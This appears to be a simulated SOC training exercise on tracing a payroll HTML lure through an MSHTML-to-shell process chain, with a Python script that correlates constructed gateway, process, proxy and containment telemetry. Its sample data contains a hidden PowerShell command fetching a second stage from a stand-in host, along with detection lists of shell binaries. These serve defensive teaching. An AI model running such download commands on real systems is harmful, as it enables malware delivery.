February KEV Pair
10 February 2026. CISA adds two related Microsoft protection-mechanism failures to the KEV catalog. Your proxy team already sees HTML smuggling attachments that match the CERT email template.
Briefing
The attacker sends a payroll HTML attachment that is rendered through a legacy MSHTML path and spawns shell activity on the workstation. You see only safe telemetry: mail gateway rows, process excerpts, proxy blocks, and host containment evidence.
Your role
SOC lead correlating email gateway telemetry with the KEV drop.
Objective
Trace the simulated campaign from payroll HTML lure to the shell/MSHTML process chain, then confirm host isolation and check build posture (which hosts still run an unpatched build).
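One way to do the correlation the objective asks for, as an added example that is not part of the exercise files: join mail-gateway delivery rows, endpoint process excerpts, proxy blocks, and containment evidence per host within a time window after the lure was delivered, and flag the MSHTML-host-to-shell parent/child chain. All rows, the mailbox-to-host mapping, the field names, and the process-name lists are constructed assumptions, not data from the scenario.

```python
"""Added example: correlate constructed telemetry for a payroll-HTML lure campaign.
Every row below is constructed sample data; field names, hostnames, mailboxes and
the process-name lists are assumptions, not scenario or gateway output."""
from datetime import datetime, timedelta

# Assumed mailbox -> workstation mapping (normally from asset inventory / logon telemetry).
USER_TO_HOST = {"a.lopez@corp.example": "WS-FIN-014", "b.chen@corp.example": "WS-FIN-022"}

# Processes that host the MSHTML engine, and the shells a lure would spawn from them (assumed lists).
MSHTML_HOSTS = {"mshta.exe", "iexplore.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

MAIL_ROWS = [  # constructed mail-gateway rows
    {"ts": "2026-02-10T08:02:11Z", "rcpt": "a.lopez@corp.example", "attachment": "Payroll_Feb2026.html", "verdict": "delivered"},
    {"ts": "2026-02-10T08:02:13Z", "rcpt": "b.chen@corp.example", "attachment": "Payroll_Feb2026.html", "verdict": "delivered"},
    {"ts": "2026-02-10T08:05:40Z", "rcpt": "c.diaz@corp.example", "attachment": "Payroll_Feb2026.html", "verdict": "quarantined"},
]
PROC_ROWS = [  # constructed endpoint process excerpts
    {"ts": "2026-02-10T08:14:02Z", "host": "WS-FIN-014", "parent": "mshta.exe", "image": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -c iwr http://payroll-update.example/stage2"},
    {"ts": "2026-02-10T08:14:03Z", "host": "WS-FIN-014", "parent": "powershell.exe", "image": "cmd.exe", "cmdline": "cmd /c whoami"},
    {"ts": "2026-02-10T09:30:00Z", "host": "WS-FIN-022", "parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell Get-Date"},
]
PROXY_ROWS = [  # constructed proxy blocks
    {"ts": "2026-02-10T08:14:05Z", "host": "WS-FIN-014", "url": "http://payroll-update.example/stage2", "action": "blocked"},
]
CONTAIN_ROWS = [  # constructed EDR containment evidence
    {"ts": "2026-02-10T08:21:30Z", "host": "WS-FIN-014", "action": "network_isolated"},
]


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def is_mshtml_shell_chain(proc):
    """True when a shell is spawned directly by an MSHTML-hosting parent."""
    return proc["parent"].lower() in MSHTML_HOSTS and proc["image"].lower() in SHELLS


def correlate(mail_rows, proc_rows, proxy_rows, contain_rows, user_to_host, window=timedelta(minutes=30)):
    """Return {host: summary} for each delivered HTML lure, joining the other sources
    by host within `window` after delivery. Containment is accepted any time after delivery."""
    results = {}
    for m in mail_rows:
        if m["verdict"] != "delivered" or not m["attachment"].lower().endswith((".html", ".htm")):
            continue
        host = user_to_host.get(m["rcpt"])
        if host is None:  # no host mapping: cannot correlate endpoint data
            continue
        t0 = parse_ts(m["ts"])
        t1 = t0 + window

        def in_window(row):
            return row["host"] == host and t0 <= parse_ts(row["ts"]) <= t1

        chain = [p for p in proc_rows if in_window(p) and is_mshtml_shell_chain(p)]
        blocks = [x for x in proxy_rows if in_window(x) and x["action"] == "blocked"]
        isolated = [c for c in contain_rows
                    if c["host"] == host and c["action"] == "network_isolated" and parse_ts(c["ts"]) >= t0]
        if chain and isolated:
            stage = "contained"
        elif chain:
            stage = "execution_uncontained"  # chain seen but no isolation evidence: escalate
        else:
            stage = "delivered_only"
        timeline = sorted(
            [(m["ts"], "mail", f"delivered {m['attachment']} to {m['rcpt']}")]
            + [(p["ts"], "process", f"{p['parent']} -> {p['image']}: {p['cmdline']}") for p in chain]
            + [(x["ts"], "proxy", f"blocked {x['url']}") for x in blocks]
            + [(c["ts"], "containment", c["action"]) for c in isolated]
        )
        results[host] = {"recipient": m["rcpt"], "chain_seen": bool(chain), "proxy_blocked": bool(blocks),
                         "isolated": bool(isolated), "stage": stage, "timeline": timeline}
    return results


if __name__ == "__main__":
    for host, summary in correlate(MAIL_ROWS, PROC_ROWS, PROXY_ROWS, CONTAIN_ROWS, USER_TO_HOST).items():
        print(f"{host}: {summary['stage']}")
        for ts, source, detail in summary["timeline"]:
            print(f"  {ts} [{source}] {detail}")
```

A host whose stage comes back as `execution_uncontained` is the one to act on first: the lure executed but no isolation evidence followed. The 30-minute window is a tuning choice; widen it if your endpoint agent batches events.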
Terminal environment
- user: responder
- host: soc-bridge-01
- cwd: /home/soc/feb-kev
- steps: 8
Safety note. This is a safe reconstruction. All systems, files, hosts, credentials, and outputs are simulated. Do not use these techniques on systems you do not own or have explicit permission to test.